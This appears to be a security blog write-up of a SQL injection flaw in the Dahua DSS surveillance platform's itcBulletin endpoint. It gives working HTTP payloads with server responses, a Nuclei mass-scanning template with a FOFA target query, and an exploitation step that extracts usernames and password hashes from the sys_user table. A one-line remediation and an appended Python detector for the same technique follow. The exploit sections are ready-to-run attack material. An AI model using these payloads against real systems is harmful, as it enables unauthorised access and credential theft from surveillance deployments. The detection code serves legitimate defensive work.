Dahua DSS SQL injection vulnerability (with exploit)


2024-07-05 02:07 | Source: compiled from the web | Views: 265

05 Vulnerability reproduction

Send the following request to the test target; the payload computes md5(102103122):

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1

The response is as follows:

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 581
Content-Type: text/xml;
Date: Tue, 19 Dec 2023 10:13:48 GMT
Server: Apache-Coyote/1.1

soap:Server
PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 ) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'; nested exception is java.sql.SQLException: XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'

The response body contains 6cfe798ba8e5b85feb50164c59f4bec, the MD5 value the payload asked the database to compute.

Reproduction successful.

06 Nuclei PoC

The PoC file contents are as follows:

id: dahua-dss-itcBulletin-sqli

info:
  name: 大华DSS itcBulletin SQL注入漏洞
  author: fgz
  severity: high
  description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
  metadata:
    fofa-query: app="dahua-DSS"

requests:
  - raw:
      - |+
        POST /portal/services/itcBulletin?wsdl HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'

Run the PoC:

.\nuclei.exe -t dahua-dss-itcBulletin-sqli.yaml -l dahua-dss.txt

07 Exploitation

To retrieve the system's usernames and password hashes through the vulnerability, replace the md5() call in the PoC with a SQL subquery:

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

(updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1

The response is as follows:

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 643
Content-Type: text/xml;charset=ISO-8859-1
Date: Tue, 19 Dec 2023 11:46:52 GMT
Server: Apache-Coyote/1.1

soap:Server
PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'; nested exception is java.sql.SQLException: XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'

Here system is the username and 8e173a7bb9ec8156d772cf4 is the MD5 of its password.

08 Remediation

Upgrade to the latest version, or deploy a WAF in front of the system for protection.
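The detection side of the advice above, as an added example that is not part of the original post and not Dahua's code: a small Python scanner that flags the error-based injection technique shown on this page (updatexml() or extractvalue() wrapped around concat() with a 0x7e / '~' delimiter) in request bodies sent to the itcBulletin endpoint, and parses the 'XPATH syntax error' message that carries leaked query output out of the 500 response. The endpoint path and the error-message format come from the page; the traffic records, the helper names and the verdict labels are constructed for this example. It generalises past the md5(102103122) probe: any payload using the same functions, including URL-encoded, mixed-case or comment-padded variants, is classified the same way, so the same patterns can back a WAF rule or a SIEM search that catches both the probe and its success.

```python
"""Added example: detect error-based SQL injection against the itcBulletin endpoint.

Not code from the original post or from Dahua. Endpoint path and the MySQL
'XPATH syntax error' leak format are taken from the page; records are constructed.
"""
import re
from urllib.parse import unquote_plus

# Endpoint named on the page (assumption: the path is matched as a prefix).
VULN_PATH = "/portal/services/itcBulletin"

# MySQL functions abused for error-based extraction, and the 0x7e / '~'
# delimiter the PoC uses to frame the leaked value inside the error message.
_ERROR_BASED = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
_MARKER = re.compile(r"0x7e|~", re.IGNORECASE)
# The page's query shows the injected value closing an IN ( ... ) list early
# and appending a boolean tail; this catches probes without updatexml().
_CLOSE_AND = re.compile(r"\)\s*and\s*\(", re.IGNORECASE)
# Leak format from the page: XPATH syntax error: '~<value>~' (the trailing
# '~' is missing when MySQL truncates the message, as in the md5 probe).
_LEAK = re.compile(r"XPATH syntax error:\s*'~([^']*?)~?'")


def normalize(body: str) -> str:
    """Undo one layer of URL encoding, strip /* */ comments, collapse whitespace."""
    text = unquote_plus(body)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)
    return " ".join(text.split())


def classify_request(path: str, body: str) -> str:
    """Return 'injection', 'suspicious' or 'benign' for one request."""
    text = normalize(body)
    if _ERROR_BASED.search(text) and _MARKER.search(text):
        return "injection"
    if path.startswith(VULN_PATH) and _CLOSE_AND.search(text):
        return "suspicious"
    return "benign"


def leaked_value(response_body: str):
    """Return the value an error-based payload leaked, or None if none is present."""
    m = _LEAK.search(response_body)
    return m.group(1) if m else None


def scan(records):
    """One alert per record whose request or response looks like error-based SQLi."""
    alerts = []
    for i, rec in enumerate(records):
        verdict = classify_request(rec["path"], rec["body"])
        leak = leaked_value(rec["response"]) if rec["status"] == 500 else None
        if verdict != "benign" or leak is not None:
            alerts.append({"index": i, "verdict": verdict, "leaked": leak})
    return alerts


# Constructed sample traffic (not captured from a real system): a benign call,
# the page's md5 probe with its leaked hash, and a URL-encoded, mixed-case,
# comment-padded variant of the same technique.
SAMPLE_RECORDS = [
    {"path": "/portal/services/itcBulletin?wsdl", "status": 200,
     "body": "1", "response": "<bulletins/>"},
    {"path": "/portal/services/itcBulletin?wsdl", "status": 500,
     "body": "(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1",
     "response": "soap:Server ... error code [1105]; XPATH syntax error: "
                 "'~6cfe798ba8e5b85feb50164c59f4bec'"},
    {"path": "/portal/services/itcBulletin?wsdl", "status": 500,
     "body": "%28UpdateXML%2F**%2F%281%2Cconcat%280x7E%2Cmd5%281%29%2C0x7E%29"
             "%2C1%29%29%29+and+%281%3D1",
     "response": "XPATH syntax error: '~c4ca4238a0b923820dcc509a6f75849'"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(alert)
```

Matching on the response as well as the request matters: a WAF that only inspects request bodies will miss an encoding it does not decode, while a 500 whose body contains the XPATH leak pattern is a high-confidence sign that a probe both reached the database and succeeded.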



